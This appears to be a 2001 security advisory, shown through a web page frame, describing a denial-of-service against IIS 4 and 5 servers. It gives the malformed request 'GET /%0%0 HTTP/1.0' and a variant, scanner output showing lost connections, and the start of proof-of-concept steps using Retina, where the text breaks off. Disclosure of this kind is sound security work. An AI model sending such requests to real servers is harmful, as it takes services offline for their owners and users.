|
|
Home : Advisories : DoSing IIS4 and fully patched IIS5 using GET command
| Title: |
DoSing IIS4 and fully patched IIS5 using GET command |
| Released by: |
SecurHack. Labs |
| Date: |
13th January 2001 |
| Printable version: |
Click here |
______________________________________________________________________
NtWaK0, SecurHack. Labs
Security Advisory 1-13-2001
DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
oooooooooooooooooo
Vulnerable Systems
oooooooooooooooooo
IIS 4 and IIS 5 even if fully patched.
oooooooo
Synopsis
oooooooo
While playing with miner in retina I sent this GET /%0%0 HTTP/1.0 to one
of my
IIS 4 and IIS 5 servers, I noticed that retina is taking a lot of
time
to jump to the next defined variable in the brain.ini which should be GET
/%0%1
and so on.
Retina Result
ooooooooooooo
Command: GET /%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060 Command:
GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Pinging the box while running retina even from different subnet it wont
answer.
You can connect to the web but you have to wait forever for it to load.
I have tried that on IIS 4 and II 5 and same result ....
oooooooooooooooo
Proof-Of-Concept
oooooooooooooooo
1- Get Retina From eeye.com
2- Install it
3- Edit the file Brain.ini located
C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini
|
